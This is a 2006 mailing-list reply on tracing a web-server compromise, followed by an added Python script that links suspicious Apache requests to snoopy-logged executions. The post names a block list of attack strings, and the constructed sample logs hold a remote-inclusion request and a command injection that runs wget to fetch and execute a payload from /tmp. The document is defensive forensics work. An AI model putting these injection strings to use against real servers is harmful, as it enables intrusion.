On Fri, Apr 07, 2006 at 02:51:35PM -0700, Joe Emenaker wrote:

> I could never find anything glaring in the logs. So, I eventually had to
> write a script that just watched the /tmp and /var/tmp directories every
> few seconds for files with the distinctive signature. If found, it
> killed all of the processes created by them and deleted them. It also
> recorded the time that it happened so I could narrow down how many log
> entries I had to scrutinize.

That is an appalling approach to dealing with the problem, especially if you have an old kernel which could allow privilege escalation.

There are several approaches to actually tracking down the source of the problem. The most obvious is to use the mod_security module for Apache to log incoming payloads and ban requests containing strings such as 'wget', 'r0nin', '/tmp', etc.

Another approach would be to install 'snoopy', or similar, to log *every* executed script upon a host and then walk backwards from the initial intrusion to the execution of the script.

Steve
--
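The walk-back Steve describes, as an added example that is not code from this thread, from mod_security or from snoopy: a Python script that flags Apache access-log requests whose URL-decoded request line contains the strings named above ('wget', 'r0nin', '/tmp'), picks out snoopy-logged executions by the web server's uid that run from or reference /tmp or /var/tmp, and links each execution to the latest flagged request that arrived within a two-minute window before it. All log lines are constructed for the example; the snoopy line layout ("[uid:... cwd:... filename:...]: cmd"), the web server uid of 48, the year 2006 and the assumption that both logs share one local clock are assumptions, not facts from the thread.

```python
"""Walk back from a suspicious process execution (snoopy syslog lines) to the
HTTP request that triggered it (Apache access log).  Added example; the log
lines are constructed, the snoopy format and uid 48 are assumptions."""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Strings named in the post.  They are matched against the URL-decoded
# request line so that %2Ftmp or %20wget cannot slip past the check.
BAD_STRINGS = ("wget", "r0nin", "/tmp")
TMP_DIRS = ("/tmp", "/var/tmp")

# Apache combined log: ip ident user [ts] "request" status ...
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
# Assumed snoopy syslog layout: "... snoopy[pid]: [uid:N sid:N tty:X cwd:D filename:F]: cmd"
SNOOPY_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ snoopy\[\d+\]: '
    r'\[uid:(?P<uid>\d+) [^\]]*cwd:(?P<cwd>\S*) filename:(?P<file>\S+)\]: (?P<cmd>.*)$'
)

# Constructed sample logs (not real traffic).
ACCESS_LOG = """\
198.51.100.23 - - [07/Apr/2006:14:39:58 -0700] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Apr/2006:14:40:12 -0700] "GET /index.php?page=http://198.51.100.9/r0nin.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [07/Apr/2006:14:40:13 -0700] "GET /cmd.php?c=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F198.51.100.9%2Fr0nin HTTP/1.1" 200 100 "-" "-"
198.51.100.23 - - [07/Apr/2006:14:45:00 -0700] "GET /tmp-agenda.html HTTP/1.1" 404 300 "-" "Mozilla/5.0"
""".splitlines()

SNOOPY_LOG = """\
Apr  7 14:40:13 web1 snoopy[2230]: [uid:48 sid:2200 tty: cwd:/var/www/html filename:/bin/sh]: sh -c cd /tmp;wget http://198.51.100.9/r0nin
Apr  7 14:40:14 web1 snoopy[2231]: [uid:48 sid:2200 tty: cwd:/tmp filename:/usr/bin/wget]: wget http://198.51.100.9/r0nin
Apr  7 14:40:15 web1 snoopy[2232]: [uid:48 sid:2200 tty: cwd:/tmp filename:/usr/bin/perl]: perl r0nin
Apr  7 14:41:02 web1 snoopy[2240]: [uid:0 sid:1 tty: cwd:/ filename:/usr/sbin/logrotate]: logrotate /etc/logrotate.conf
Apr  7 14:50:00 web1 snoopy[2250]: [uid:48 sid:2200 tty: cwd:/var/www/html filename:/usr/bin/php]: php -r echo 1;
""".splitlines()


def parse_access(line):
    """Parse one access-log line; timestamp is kept as naive local time."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
    return {"ip": m["ip"], "ts": ts, "request": m["req"],
            "decoded": unquote_plus(m["req"])}


def suspicious_requests(access_lines):
    """Requests whose decoded request line contains any of BAD_STRINGS."""
    hits = []
    for line in access_lines:
        rec = parse_access(line)
        if rec is None:
            continue
        low = rec["decoded"].lower()
        matched = [s for s in BAD_STRINGS if s in low]
        if matched:
            rec["matched"] = matched
            hits.append(rec)
    return hits


def parse_snoopy(line, year):
    """Parse one snoopy syslog line; syslog has no year, so one is supplied."""
    m = SNOOPY_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
    return {"ts": ts, "uid": int(m["uid"]), "cwd": m["cwd"],
            "filename": m["file"], "cmd": m["cmd"]}


def suspicious_execs(snoopy_lines, year, web_uid):
    """Executions by the web server uid that run from, run out of, or mention /tmp or /var/tmp."""
    out = []
    for line in snoopy_lines:
        rec = parse_snoopy(line, year)
        if rec is None or rec["uid"] != web_uid:
            continue
        if (rec["cwd"].startswith(TMP_DIRS) or rec["filename"].startswith(TMP_DIRS)
                or any(d in rec["cmd"] for d in TMP_DIRS)):
            out.append(rec)
    return out


def walk_back(access_lines, snoopy_lines, year=2006, web_uid=48,
              window=timedelta(seconds=120)):
    """Pair each suspicious exec with the latest flagged request at or before it
    and no older than `window`; None when nothing in the log explains it."""
    reqs = sorted(suspicious_requests(access_lines), key=lambda r: r["ts"])
    chain = []
    for ex in suspicious_execs(snoopy_lines, year, web_uid):
        cands = [r for r in reqs if ex["ts"] - window <= r["ts"] <= ex["ts"]]
        chain.append((ex, cands[-1] if cands else None))
    return chain


if __name__ == "__main__":
    for ex, req in walk_back(ACCESS_LOG, SNOOPY_LOG):
        src = f'{req["ip"]} {req["decoded"]}' if req else "no matching request"
        print(f'{ex["ts"]} uid={ex["uid"]} cwd={ex["cwd"]} {ex["cmd"]!r}  <-  {src}')
```

In the sample data the three web-server executions (the sh -c, the wget, the perl) all resolve to the cmd.php request at 14:40:13, which is the line to read the rest of the log around. The later /tmp-agenda.html hit shows the caveat a plain substring rule carries: '/tmp' also matches harmless URLs, so log on match first and only ban once the pattern list has been checked against real traffic.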